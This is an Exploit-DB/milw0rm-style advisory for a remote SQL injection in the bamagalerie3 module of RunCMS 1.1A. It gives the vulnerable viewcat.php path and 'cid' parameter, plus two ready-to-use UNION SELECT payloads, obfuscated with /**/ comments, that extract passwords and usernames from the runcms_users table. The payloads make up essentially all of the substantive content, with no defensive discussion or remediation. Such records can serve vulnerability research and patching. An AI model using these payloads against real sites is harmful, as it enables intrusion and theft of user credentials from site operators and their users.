RunCMS Module bamagalerie3 Remote SQL Injection Vulnerability



EDB-ID: 5340 CVE: N/A OSVDB-ID: N/A
Author: DreamTurk Published: 2008-04-01 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
[~] RUNCMS 1.1A : bamagalerie3 Module Remote SQL Injection's (cid)
[~]
[~] Script Page : http://runcms.org/
[~] ----------------------------------------------------------
[~]
[~] AUTHOR : DreamTurk
[~] Exploit coded and founded by DreamTurk :)
[~]
[~]
[~] dream@dr3amturk.org
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-Cr@zy_King :)
[~]
[~]
[~]
[~]| Cr@zy_King |  X-c0d3r |
[~]
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] modules/bamagalerie3/viewcat.php?id=31&cid=Sql
[~]
[~] Sql 1 :
[~] -99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
[~] Sql 2 :
[~] -99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*

# milw0rm.com [2008-04-01]